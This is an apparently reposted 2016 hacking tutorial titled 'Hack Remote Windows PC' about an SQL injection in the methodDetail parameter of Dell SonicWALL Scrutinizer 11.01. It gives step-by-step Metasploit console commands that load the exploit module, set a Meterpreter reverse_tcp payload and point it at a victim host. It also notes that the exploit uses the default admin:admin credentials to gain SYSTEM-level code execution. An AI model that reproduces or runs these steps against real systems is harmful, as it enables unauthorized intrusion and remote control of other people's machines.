Hack Remote Windows PC Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection

Datetime:2016-08-23 00:15:34         Topic: SQL Injection          Share        Original >>
Here to See The Original Article!!!

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.

Exploit Targets

Dell SonicWALL Scrutinizer 11.01

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type  msfconsole

Now type  use exploit/ multi/http/sonicwall_scrutinizer_methoddetail_sqli

msf exploit( sonicwall_scrutinizer_methoddetail_sqli )> set payload windows/meterpreter/reverse_tcp

msf exploit( sonicwall_scrutinizer_methoddetail_sqli )> set lhost 192.168.0 . 108 (IP of Local Host)

msf exploit( sonicwall_scrutinizer_methoddetail_sqli )> set rhost 192.168.0.120

msf exploit ( sonicwall_scrutinizer_methoddetail_sqli )> exploit








New